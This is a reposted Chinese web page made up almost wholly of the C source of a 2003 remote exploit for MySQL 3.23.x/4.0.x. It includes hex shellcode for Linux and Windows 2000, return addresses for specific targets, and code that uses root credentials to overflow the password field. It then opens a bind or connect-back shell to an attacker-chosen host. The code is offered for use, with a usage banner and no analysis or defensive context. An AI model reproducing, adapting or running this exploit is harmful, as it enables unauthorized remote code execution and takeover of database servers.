本文作者: swap
文章出处:
http://www.feelids.com复制内容到剪贴板
代码:
/* exp for mysql
* proof of concept
* using jmp *eax(for RH 8.0)
* using call *ebx(for RH 7.1)
* using jmp *edx(for windows)
* bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com) 2003/09/15
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRUBITED IT
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netdb.h>
#include <mysql/mysql.h>
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define ADDUSER "grant all privileges on zzzzzzzz.* to zzzzzzzz identified by 'zzz'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 2048
#define VER "2.4"
#define CMD "uname -a;id\n"
#define PT_OFF 482
#define IP_OFF 500
#define PT_OFF1 366
MYSQL *conn;
char NOP[]="90";
char linux_shellcode[]=
"db31c03102b0c931"
"c08580cdc3893474"
"d231c03180cd07b0"
"40b0c03109b180cd"
"c031c38980cd25b0"
"80c2fe43f07203fa"
"14b0c031c38980cd"
"c931c03125b009b1"
"17b080cdc03180cd"
"89504050b0c931e3"
"b180cda283c889e0"
"d0f70ae831c78940"
"894c40c0525050e2"
"4c8d5157db310424"
"66b00ab3835980cd"
"057501f874493a80"
"31d2e209c38940c0"
"fb8980cd3fb003b1"
"4180cd496851f8e2"
"68732f6e622f2f68"
"51e3896969692d68"
"51e28970e1895352"
"c031d23180cd0bb0"
;
//bind on 53 port
char win_shellcode2[]=
"909090909090909010EB9090C9334A5A"
"0176B966990A348005EBFAE2FFFFEBE8"
"996170FF21C39999E6646995E9129912"
"D9123485124112916A9AA5EA9AE1EF12"
"B9E7126AD712629ACF74AA8DA612C8CE"
"6B12629A6AC097F3C091ED3F9D5E1AC6"
"C0707BDC5412C7C69ABDDF129A78485A"
"FF50AA58DF129112585A9A85589A9B78"
"5A9A99126E12631212975F1AC09AF349"
"9999ED71945F1A99CE66CFCB4112C365"
"71C09AF3999999F812DD751AC089F36D"
"7B179D10C9C9C962F398F3C96DCE669B"
"C7104112A5C710A1FFD9C71098B5DF5E"
"89DE149859AACFC9F3C9C9C914C9C998"
"9B5EA5CE99FDF4FACE66C9CB9B9E5E71"
"5EAC999999E69DDE89F39899CE66CACE"
"CE66CA61CE66C9653559AA7560EC591C"
"CACFCBC8C0C34B66AA777B329A715A59"
"DE666666EBC9EDFCFDD8FAF6EAFCEBFD"
"EBDA99EAFCEDF8FCFAF6EBC9D8EAEAFC"
"F0E1DC99F6EBC9EDEAEAFCFAF8F6D599"
"FBF0D5FDE0EBF8EBEAEE99D8ABAAC6AB"
"D8CACE99F2FAF6CA99D8EDFCF7F7F6FA"
"99EDFAFCEAF6F5FAFAF6EAFC99EDFCF2"
;
char win_shellcode1[]=
"EB909090334A5A107EB966C90A348001"
"EBFAE299FFEBE8059570FFFFC3999998"
"99A938FDD912999985E9129591D91234"
"EA12411287ED12A5126A9AE1629AB9E7"
"AA8DD712C8CECF74629AA61297F36B12"
"ED3F6AC01AC6C0917BDC9D5EC7C6C070"
"DF125412485A9ABDAA589A789112FF50"
"9A85DF129B78585A9912589A63125A9A"
"5F1A6E12F34912971E71C09A1A999999"
"CFCB945FC365CE669CF3411299ED71C0"
"C9C9999998F3C9C9CE669BF35E411275"
"99999B9E1059AAAC89F39DDECE66CACE"
"CA98F369C96DCE66CE66CAC91A491261"
"6D12DD7589F359AA179D10C0CF10627B"
"A5CF10A1FFD9CF1098B5DF5E89DE1498"
"50AACFC9F3C8C8C85EC8C898F4FAA5DE"
"DE1499FD66C8C9A566CB79CE66CA65CE"
"66C965CE59AA7DCEEC591C35CFCBC860"
"C34B66CA777B32C0715A59AA66666776"
"C9EDFCDED8FAF6EBFCEBFDFDDA99EAEA"
"EDF8FCEBF6EBC9FCEAEAFCFAE1DC99D8"
"EBC9EDF0EAFCFAF6F6D599EAF0D5FDF8"
"EBF8EBFBEE99D8E0AAC6ABEACACE99AB"
"FAF6CAD8D8EDFCF2F7F0FB99F0F599FD"
"F7FCEDEAFAFAF89999EDE9FCEAF6F5FA"
"FAF6EAFC99EDFCF29090909090909090"
;
int win_port=53;
int type=1;
struct
{
char *os;
u_long ret;
int pad;
int systemtype; //0 is linux,1 is windows
} targets[] =
{
{ "linux:glibc-2.2.93-5(rh8.0)", 0x42125b2b,19*4*2,0},
{ "linux:glibc-2.2.2-10(rh7.1)",0x4019888D,19*4*2,0},
{ "windows2000 SP3 CN",0x77e625db,9*4*2,1},
{ "windows2000 SP4 CN",0x77e7bec3,13*4*2,1},
},v;
void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);
int main(int argc,char **argv)
{
char jmpaddress[8];
char buffer[BUF],muser[20],buf2[1200];
struct sockaddr_in clisocket;
int i=0,j,clifd,count;
char data1,c;
char *server=NULL,*rootpass=NULL,*cbhost=NULL;
int pad,systemtype;
unsigned long cbip;
unsigned short cbport=win_port,icbport;
char tmpbuf[5];
u_long jmpaddr;
int bind=0;
if(argc<3) usage(argv[0]);
while((c = getopt(argc, argv, "d:t:p:h:o:"))!= EOF)
{
switch (c)
{
case 'd':
server=optarg;
break;
case 't':
type = atoi(optarg);
if((type > sizeof(targets)/sizeof(v)) || (type < 1))
usage(argv[0]);
break;
case 'p':
rootpass=optarg;
break;
case 'h':
cbhost=optarg;
break;
case 'o':
cbport=atoi(optarg) & 0xffff;
break;
default:
usage(argv[0]);
return 1;
}
}
if(server==NULL || rootpass==NULL)
usage(argv[0]);
memset(muser,0,20);
memset(buf2,0,1200);
pad=targets[type-1].pad;
systemtype=targets[type-1].systemtype;
if(systemtype==1)
{
if(cbhost==NULL)
bind=1;
else
{
if(inet_addr(cbhost)==-1)
{
printf("[-] Invalid connect back host/ip\n");
exit(0);
}
bind=0;
}
}
jmpaddr=targets[type-1].ret;
printf("@-------------------------------------------------@\n");
printf("# Mysql 3.23.x/4.0.x remote exploit(09/15)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("---------------------------------------------------\n");
printf("[+] system type:%s,using ret addr:%p,pad:%d\n",(systemtype==0)?"linux":"windows",jmpaddr,pad);
printf("[+] Connecting to mysql server %s:%d....",server,PORT);
fflush(stdout);
conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
if(conn==NULL) exit(0);
printf("ok\n");
printf("[+] ALTER user column...");
fflush(stdout);
if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
sqlerror("ALTER user table failed");
//select
printf("ok\n");
//getchar();
printf("[+] Adding user zzzzzzzz to table...");
fflush(stdout);
if(mysql_real_query(conn,ADDUSER,strlen(ADDUSER))!=0)
sqlerror("Add user to table failed");
/*
result=mysql_store_result(conn);
if(result==NULL)
sqlerror("store result error");
rslines=mysql_num_rows(result);
if(rslines==0)
sqlerror("Cannot find a user");
row=mysql_fetch_row(result);
snprintf(muser,19,"%s",row[0]);
printf("ok\n");
printf("[+] Found a user:%s,password:%s\n",muser,row[1]);
*/
printf("ok\n");
memset(buffer,0,BUF);
i=sprintf(buffer,"update user set password='");
sprintf(jmpaddress,"%x",jmpaddr);
jmpaddress[8]=0;
for(j=0;j<pad-4;j+=2)
{
memcpy(buf2+j,NOP,2);
}
memcpy(buf2+j,"06eb",4);
memcpy(buf2+pad,jmpaddress,8);
switch(systemtype)
{
case 0:
memcpy(buf2+pad+8,linux_shellcode,strlen(linux_shellcode));
break;
case 1:
memset(tmpbuf,0,5);
icbport=htons(cbport)^(u_short)0x9999;
sprintf(tmpbuf,"%.4x",icbport);
if(bind==0)
{
memcpy(win_shellcode2+PT_OFF,tmpbuf,4); //port define
cbip = inet_addr(cbhost)^0x99999999;
memset(tmpbuf,0,5);
sprintf(tmpbuf,"%.8x",cbip);
memcpy(win_shellcode2+IP_OFF,tmpbuf,4);
memcpy(win_shellcode2+IP_OFF-6*2,tmpbuf+4,4);
memcpy(buf2+pad+8,win_shellcode2,sizeof(win_shellcode2));
//printf("con back \n");
}
else
{
memcpy(win_shellcode1+PT_OFF1,tmpbuf,2);
memcpy(win_shellcode1+PT_OFF1-7*2,tmpbuf+2,2);
memcpy(buf2+pad+8,win_shellcode1,sizeof(win_shellcode1));
//printf("binding:win_shellcode:%s\n",win_shellcode1);
}
//exit(0);
break;
default:
printf("[-] Not support this systemtype\n");
mysql_close(conn);
exit(0);
}
j=strlen(buf2);
if(j%8)
{
j=j/8+1;
count=j*8-strlen(buf2);
memset(buf2+strlen(buf2),'A',count);
}
printf("[+] User:zzzzzzzz, Password length:%d\n",strlen(buf2));
memcpy(buffer+i,buf2,strlen(buf2));
i+=strlen(buf2);
i+=sprintf(buffer+i,"' where user='zzzzzzzz'");
//mysql_free_result(result);
printf("[+] Modified password...");
fflush(stdout);
//get result
//write(2,buffer,i);
if(mysql_real_query(conn,buffer,i)!=0)
sqlerror("Modified password error");
//here I'll find client socket fd
printf("ok\n");
printf("[+] Finding client socket......");
j=sizeof(clisocket);
for(clifd=3;clifd<256;clifd++)
{
if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;
if(clisocket.sin_port==htons(PORT)) break;
}
if(clifd==256)
{
printf("FAILED\n[-] Cannot find client socket\n");
mysql_close(conn);
exit(0);
}
printf("ok\n");
printf("[+] socketfd:%d\n",clifd);
//let server overflow
printf("[+] Overflow server....");
fflush(stdout);
send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
//if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0)
// sqlerror("Flush error");
printf("ok\n");
if(systemtype==0)
{
printf("[+] sending OOB.......");
fflush(stdout);
data1='I';
if(send(clifd,&data1,1,MSG_OOB)<1)
{
perror("error");
mysql_close(conn);
exit(0);
}
printf("ok\r\n");
send(clifd,CMD,sizeof(CMD),0);
}
printf("[+] Waiting for a shell.....\n");
//printf("[+] Press enter for continue.....");
//fflush(stdout);
//getchar();
if(systemtype==1)
{
if(bind==1)
{
clifd=socket(AF_INET,SOCK_STREAM,0);
sleep(2);
client_connect(clifd,server,cbport);
}
else
{
printf("[+] Checking the shell if is on %s:%d\n",cbhost,cbport);
mysql_close(conn);
exit(0);
}
}
//printf("[+] Waiting a shell.....");
fflush(stdout);
execsh(clifd);
mysql_close(conn);
exit(0);
}
int execsh(int clifd)
{
fd_set fds;
int count;
char buffer[BUF];
memset(buffer,0,BUF);
while(1)
{
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(clifd, &fds);
if (select(clifd+1, &fds, NULL, NULL, NULL) < 0)
{
if (errno == EINTR) continue;
break;
}
if (FD_ISSET(0, &fds))
{
count = read(0, buffer, BUF);
if (count <= 0) break;
if (write(clifd, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
if (FD_ISSET(clifd, &fds))
{
count = read(clifd, buffer, BUF);
if (count <= 0) break;
if (write(1, buffer, count) <= 0) break;
memset(buffer,0,BUF);
}
}
}
void usage(char *s)
{
int a;
printf("@-------------------------------------------------@\n");
printf("# Mysql 3.23.x/4.0.x remote exploit(09/15)-%s #\n",VER);
printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
printf("---------------------------------------------------\n");
printf("Usage:%s -d <host> -p <root_pass> -t <type> -h <cbip> -o <cbport>\n",s);
printf(" -d target host ip/name\n");
printf(" -p 'root' user paasword\n");
printf(" -h connect back ip(for windows)\n");
printf(" -o connect back port/bind port(for windows)\n");
printf(" -t type [default:%d]\n",type);
printf(" ------------------------------\n");
for(a = 0; a < sizeof(targets)/sizeof(v); a++)
printf(" %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);
printf("\n");
exit(0);
}
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
MYSQL *connect;
connect=mysql_init(NULL);
if(connect==NULL)
{
printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));
return NULL;
}
if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
{
printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
return NULL;
}
return connect;
}
void sqlerror(char *s)
{
fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
mysql_close(conn);
exit(0);
}
int client_connect(int sockfd,char* server,int port)
{
struct sockaddr_in cliaddr;
struct hostent *host;
if((host=gethostbyname(server))==NULL)
{
printf("gethostbyname(%s) error\n",server);
return(-1);
}
bzero(&cliaddr,sizeof(struct sockaddr));
cliaddr.sin_family=AF_INET;
cliaddr.sin_port=htons(port);
cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
printf("[+] Trying %s:%d....",server,port);
fflush(stdout);
if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0)
{
printf("error:%s\r\n",strerror(errno));
return(-1);
}
printf("ok\r\n");
return(0);
}
